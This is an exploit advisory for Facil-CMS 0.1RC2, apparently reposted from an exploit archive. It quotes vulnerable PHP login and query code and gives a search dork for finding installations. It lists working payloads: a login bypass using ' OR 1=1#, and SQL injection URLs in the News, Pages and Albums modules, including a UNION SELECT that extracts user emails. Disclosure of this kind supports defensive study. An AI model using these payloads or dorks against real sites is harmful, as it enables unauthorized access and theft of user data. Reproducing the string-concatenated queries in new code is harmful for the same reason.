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Facil-CMS 0.1RC2 Multiple Remote Vulnerabilities
================================================ Facil-CMS 0.1RC2 Multiple Remote Vulnerabilities ================================================ [Script] Facil-CMS 0.1RC2 +download: http://sourceforge.net/project/platformdownload.php?group_id=217673 [DORK] inurl:modules.php?modload=News Copyright (C) 2008 by FacilCMS.org inurl: /facil-cms/ [Author] any.zicky [Contact Me] any__dot__zicky__at__gmail__dot__com ;) [About] Facil CMS is a Free and Open Source Project for your site Content Management System (CMS). Facil CMS uses PHP 5 and connect to many database systens. Facil CMS is Easy to create and modify modules for your system and Support Theme Templates. [Other bug in project] http://www.milw0rm.com/exploits/5792 [Bugs] 1) we can see phpinfo() in root_path project +Example: http://localhost/phpinfo.php 2) Auth bypass let's see login.php code [CODE] ... if($_POST['email'] && $_POST['password']) { ... $email = $_POST['email']; $password = md5($_POST['password']); $user = new Users(); $login = $user->Login($email, $password); <------------- if($login && !is_null($login) && !empty($login)) { $user = new Users($login); ... [/CODE] then let look /facil-cms/modules/Users/class/Users.mysql.class.php code [CODE] ... function Login($email, $password) { $sql = "SELECT * FROM " . _USERS_DB_TABLE_ . " WHERE email='" . $email . "' AND password='" . $password . "'"; <---------- $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); if($res->RecordCount() == 1) { return $res->fields('id'); } } ... [/CODE] +Example: http://locahost/index.php?modload=User Email: admin@facilcms.org'# pass: blaaaaa Email: ' OR 1=1# pass: blaaaaa 3) SQL-INj in News modules Let look /facil-cms/modules/News/class/News.mysql.class.php code [CODE] ... function getNewInfo($id) { $sql = "SELECT * FROM " . _NEWS_DB_TABLE_ . " WHERE id=" . $id; <---------------- $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); if($res->RecordCount() == 1) { $this->setContent($res->fields('content')); $this->setDate($res->fields('date')); $this->setId($res->fields('id')); $this->setLanguage($res->fields('language')); $this->setPublisher($res->fields('publisher')); $this->setResume($res->fields('resume')); $this->setStatus($res->fields('status')); $this->setTitle($res->fields('title')); return true; } } ... [/CODE] +Example: http://localhost/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1# 4) SQL-Inj in Pages modules Let look /facil-cms/modules/Pages/class/Pages.mysql.class.php code [CODE] ... function getPageInfo($id) { $sql = "SELECT * FROM " . _PAGES_DB_TABLE_ . " WHERE id=" . $id; <------------------ $res = $GLOBALS['DB']->Execute($sql); if($res->RecordCount() == 1) { $this->setActive($res->fields('active')); $this->setContent($res->fields('content')); $this->setId($res->fields('id')); $this->setLanguage($res->fields('language')); $this->setTitle($res->fields('title')); return true; } } ... [/CODE] +Example: http://localhost/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/* 5) SQL-inj in ALbums module Let look /facil-cms/modules/Albums/class/Photos.mysql.class.php code [CODE] ... function getPhotoInfo($id) { $sql = "SELECT * FROM " . _PHOTOS_DB_TABLE_ . " WHERE id=" . $id; <-------------------- $res = $GLOBALS['DB']->Execute($sql) or die($GLOBALS['DB']->ErrorMsg() . '<br />' . $sql); if($res->RecordCount() == 1) { $this->setId($res->fields('id')); $this->setAlbum($res->fields('album')); $this->setFile($res->fields('file')); $this->setComment($res->fields('comment')); return true; } } ... [/CODE] +Example: http://localhost/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/* # 0day.today [2024-12-27] #